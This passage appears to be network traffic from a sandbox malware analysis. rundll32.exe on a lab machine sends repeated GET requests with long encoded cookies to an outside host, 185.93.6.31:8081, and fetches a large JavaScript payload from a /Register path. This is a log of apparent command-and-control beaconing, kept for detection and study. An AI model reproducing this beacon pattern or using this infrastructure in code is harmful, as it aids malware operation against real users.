              Date: Sat, 25 Sep 2021 18:19:16 GMT
              Server: cloudflare
              Content-Length: 2415
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              32192.168.2.749821185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:19:17.310132027 CEST2881OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=ButdX4sc4k-SL4rgLPB6INCrqwZLGbB8-cW-2FzrXoGpSKYQCiBwAFuq8HgLgDA7ea7Yayl1-G9LgdlFsCe1wNbgWxNpyEotmcJ9ps6b616wBt30dIpo8b2lVBHKlZhIc0UFJjF9ZDUT26wo_10Yy32lHE3n6ZW3spSW8jMk4kNkRjtw
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:17.338299990 CEST2881INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:17 GMT
              Server: cloudflare
              Content-Length: 2437
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              33192.168.2.749836185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:19:19.249026060 CEST5931OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=XnpmP9KCZO_JUDX45I5W1wW2ycH2hq_oxUvJ3jmkJvC--vvroinSd5HQp9n-sVM6JtaOkXiu0UaCDmbgkR0bV1HtQ_06L_iFdcgR0T5MBXmusJ7lylF9DSzDF-MNwCTbrkW_czegcQJ5kxCjcbeJgK_qVTrGY1ktsw0ZWPrrE9JYNRhz
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:19.281894922 CEST6335INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:19 GMT
              Server: cloudflare
              Content-Length: 2373
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              34192.168.2.749850185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:19:22.872272015 CEST6956OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=-j9zHHfIzAxu-6Sj0CRUYyx_hUW3zZ4_BRGQm6A_cMJVnIhT9vReQ6d-3jv3VB54hXr2KNWh1iy3VfcGTPObgyo0dVCVHGRuZRZT5TJPxR1M0vO3iF5GskFxelI2QbYLj5ErZc2pSnbvD4JrA4k2iIFxMg4bPbv0TkC4sc_wzACYkhUz
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:22.900567055 CEST6956INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:22 GMT
              Server: cloudflare
              Content-Length: 2394
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              35192.168.2.749851185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:19:24.558878899 CEST6960OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=unjm4h8RkkwdTWzjUPbxK-0_UMBNJQl9OpovUJ-b6VbJkmCTKu8WefhHi2ElBaQul-TbCGTedea__YcIx73vgaDRGmWOuNhMBmYgYz8DKLSQsAP2jvXAGLJCZislPaoTTyfC9fp0EEgkvoXkTeeXSgvJusgHZhIUKswdDmVrOVPUJa8C
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:24.588365078 CEST6960INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:24 GMT
              Server: cloudflare
              Content-Length: 2245
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              36192.168.2.749852185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:19:27.968198061 CEST6964OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=-s7y9nY28CZt5KExQDrCHqECXQhSMjshYf9dF50QsjkaTm8iBp1GvjVkMxBaBcfzgmIaWNwaRY8muvIpNamPnvVZ1zSem2xM0XyFGJr4kbAKBAosbuXpxIh3gyqpdLASCvErupMU5cvdJ4Rq1QMdSQtewfNi183kF7mNkV5fhxv8gYy6
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:27.998080969 CEST6964INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:27 GMT
              Server: cloudflare
              Content-Length: 2351
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              37192.168.2.749853185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:19:28.636547089 CEST6967OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=k_1myR4K2dkHObF2ueZBtkW9kJDeD4vqbNOFTsn9ZRc8Xp2GnzZLls68y-6elgut7Ljj_bxjw_nel-LTJTGOVkP2YIX83nG7DNRGMFuN0MglEOZi4ZxTZyizb4dfg6Pe5lM-sKRrX6OGzZe-aksjXeizJ9ty_64hJ4KtZKYy2dXxUADm
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:28.665497065 CEST6968INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:28 GMT
              Server: cloudflare
              Content-Length: 2437
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              38192.168.2.749854185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:19:30.609291077 CEST6971OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=8_dwoFaeBA5UwvqhGXlnaaSwxoIEqp8_cxW5EtYUfxSAHfbRY2CAO7HIHSNsijJs3mtNSi1R46T2chFKjjJ5w-lejCfHN04OT-m2IXaMvvbZP5W0x3pWWvvN8GlssjxRBqhUt7P7hgptMROmBGgBCEJGLIpO6YRWY0OLTCzkrxGdqjlA
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:30.638292074 CEST6972INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:30 GMT
              Server: cloudflare
              Content-Length: 2373
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              39192.168.2.749855185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:19:35.877868891 CEST6975OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=mMjIihQwyloP4ptNIjz4YsMEZ3QwNAFdA_lna_8WiEV4SFVeZJt8wldiCWw4A_2P4GQgJL4cf_NEvMhVV6-14pdf7Uj8nVYws3q_ZPj-q8xoAjBQDOPTuOpxuVbLcopuaPcRxvES37e_Ib4WtwUnNWlY-48A0feYdb-37TxZvWeeh7bG
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:35.905204058 CEST6975INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:35 GMT
              Server: cloudflare
              Content-Length: 2394
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              4192.168.2.749744185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:18:14.405805111 CEST1466OUTGET /Register/v7.19/UJCIF1N2 HTTP/1.1
              Accept: application/json, application/xhtml+xml, image/*
              Accept-Language: zh-cn
              Accept-Encoding: identity, br
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:14.433989048 CEST1467INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:14 GMT
              Server: gsw
              Content-Length: 264862
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              40192.168.2.749856185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:19:36.783020973 CEST6979OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=aOtv7-Uc0P_8L7hQQvBIkL6rmbYlGYLMl8WMaDLrbDHHSJSgZCBCsDWqwshlgAKLF67q20d1yt8lgev13ieHcLjgaaMHyHid98JPFqCb2e7eBu9EGopaQdOlZqGklar4HUU3ll99VoV9256YkV0qexOlLv2J6acH3JSkQl0k0PMKRgnA
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:36.817608118 CEST6979INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:36 GMT
              Server: cloudflare
              Content-Length: 2223
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              41192.168.2.749857185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:19:38.423207998 CEST6982OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=9iHDV1NIt_lRFElWHK_UnqFmdXUBfCzIdsMK5dPCzOOFy0UmZrYzzLQertRpXIGb273-vSiHUFPzpKK9i-TKNOyIP9DC4f35Sj8F1nNaDQHc6SZDwqzlrf4bQ55pZI-mA37nQLYtNf1o56BRAb6y_0eQn31LPzehZpU4uykyHOaYfIq3
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:38.452397108 CEST6983INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:38 GMT
              Server: cloudflare
              Content-Length: 2415
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              42192.168.2.749858185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:19:42.577856064 CEST6986OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=n1yu4hKrEfILmHldtUeJnUkcWLvSrkPBYHJNZcVcrTww_1Wtk5eDvcIdA8WSN8OG4Bkr1rDCC9LSNir4KZBGfU9XqK7wf7mQAHWOG1csGOMpsS5J7T2bTCQSp6xTImv16vL2m6jKl4iKbF-VZurrduQS7_B-XmYKKyNlT6qTEf798cjN
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:42.605875015 CEST6987INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:42 GMT
              Server: cloudflare
              Content-Length: 2223
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              43192.168.2.749859185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:19:44.763567924 CEST6990OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=g0eC4A-_gDAUbdEnObOyCNiLLR4ru0s3GHYtAeSZwi9jxx80fxQ2qEztQwYjjLfl--tqTqWTNZlfM4I_TCD_iIzQpyLnEhxaqPX1DuNx4aZzjXo6F2yZ0vH-8zzQ_cAEc3hbrOqdld2krvR8rIptX3LXseUbXr3ybjD9hyfW9w2FCPys
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:44.794364929 CEST6991INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:44 GMT
              Server: cloudflare
              Content-Length: 2373
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              44192.168.2.749861185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:19:45.999237061 CEST7002OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=oIPDnwXqtzEHtkmeSg3UVvfEdb1X3iwAIGEKLYVgzCvTaUXuMBQzBOK8rhw__oFTjR_-dX4lUJulBqJ13UbK_LoqPxiUQ_0xHJ0FHiX4DcmKSyaLlA7lZai5Q1Y_xo9uVdzniOCPNTU-RaCZVxyyNxEyn7UdnTdpMDc4c3-QHC7O3op_
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:46.028431892 CEST7003INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:46 GMT
              Server: cloudflare
              Content-Length: 2415
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              45192.168.2.749865185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:19:50.908303976 CEST7019OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=NO4zVLkZjESgKuTrHvUUK-KuxQ15HN53y8DQ027uMIqbTcgbOCUeC2mvnnM5hV4wS6u2YBtwlmR5hLdOgiLby-TlNRhbzSQmq8cTrfyehVWCA7P_Ro8G-o-gOhr4kPZDQUBrLQN4Cj4h3sIjzVh2wE-gckbV7Pu8gJH4-QEhjEhWQ1V7
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:50.935841084 CEST7019INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:50 GMT
              Server: cloudflare
              Content-Length: 2437
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              46192.168.2.749866185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:19:53.204129934 CEST7023OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=92pnD3uSZd9gQDTITZ5X56ymyPFflq7YbFvI7pC0J8AX6vrbCznTRzjApulXoVIKj8aPodG-0HYrHmfQOA0aZ_j9Qs2TP_m13NgQ4ZdcBEkHoJ_VY0F8PYXTFtOk0CXrB1W-Q56wcDLQgxGT2KeIsAb6VApvc1gdGh0YaFP7EuLxJRlD
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:53.234618902 CEST7023INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:53 GMT
              Server: cloudflare
              Content-Length: 2223
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              47192.168.2.749867185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:19:54.893625975 CEST7026OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=wUIBGWQrdbdmd4sYK8wW0JYFtzs2H-6GQaDIq-ShDq2yqIdoUdXxgoN9bJpeP0PV7N488x_kkh3Ex2DzvIcIetvr_Z71gj-3fVzHmEQ5z0_riuQN9c8n48l4gdBeB03oNB0lDoFO97NfhGIfNt1wsXDzXTN8XPXvUfb69R5R3qivH0j5
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:54.921235085 CEST7027INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:54 GMT
              Server: cloudflare
              Content-Length: 2479
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              48192.168.2.749868185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:19:58.170582056 CEST7030OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=2KzkdVVbW2VMaDPK8rfDCg7sEiyVXglWJ4IH8oKs56t3Dx861GfJKoXtSVLVx4kRp-lhQfcyQUWVxmBvbmAM6gin4jm3j_MHR4XEjBDcUnRuQWTeqs3R22Pi7TsU0iFirQK8DO863R_NnBUCIRqh4aPipWc5riydbNMv2O1jW2m6AYJa
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:58.199692011 CEST7031INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:58 GMT
              Server: cloudflare
              Content-Length: 2373
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              49192.168.2.749869185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:19:59.439158916 CEST7034OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=6xT-pWfs_HV8Pq1iUeDOTbDYUVtD6DdycCVRRIzKvmoLlGNxF0dK7SS-P0NL38ugk7gWC83ASdw3YP56JHODzeSD22ePQWAfwKaJS4sineMb3gZ_fz_ll5mtj3m4rrxBGysn6YLO6ZjM_Yg5xNkRGhqEzaBzDcG3BmOBwk-Fi0jtW4Dp
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:59.467138052 CEST7035INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:59 GMT
              Server: cloudflare
              Content-Length: 2458
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              5192.168.2.749745185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:18:14.762335062 CEST1739OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=kmf3XTcOg_M1Un1ceOnglMUgQX9lOhjCEoU-77eE-OnhjXEsAvAHxtBYmt4NGrWRv_vKt0zBZFmX4pa376L-PojOC9qmp8nzLnkx3BccOQu4rxJJpurRp5pdd5QNIrusZzjTStJrAfcMoZRbZfiG9SPWq3cveQOrAtMMsU10KOz8Or69
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:14.796147108 CEST1739INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:14 GMT
              Server: cloudflare
              Content-Length: 2287
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              50192.168.2.749870185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:20:01.236423969 CEST7038OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=7OY85EmPSEpL07blBmgrLbuhisYbu9N7bAT1VskFM1CfDLqVfHHMf67ZUWdzm34owXoBDjJAr-DpY10OkSM1h_ZPwGPYJgJKUPj6ZWmd8rLGLtnw2GsaHuTcvC1zo3AVGbkY86zqyk5yIF_iG3lNTF1XYM5R-MgSfFLHCDP141WCu3UE
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:20:01.265721083 CEST7038INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:20:01 GMT
              Server: cloudflare
              Content-Length: 2330
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              51192.168.2.749871185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:20:03.797141075 CEST7042OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=xB6RwEnpLtBQ2kZ_7gW2vxJeZ5mJ7HzjOzByR54ekh5rvWqPyNW8n5lfPOfJdfyku1sU9OuANPCJdBXactJ5XxQVl4yrPYayWzexOQxuJ8Fy8xFrtn-kbn9QmI4IYFTXsbDJufOIqKrRLmC3PajUVL9Q0NIlHFkocGFabfHRLtyms_fv
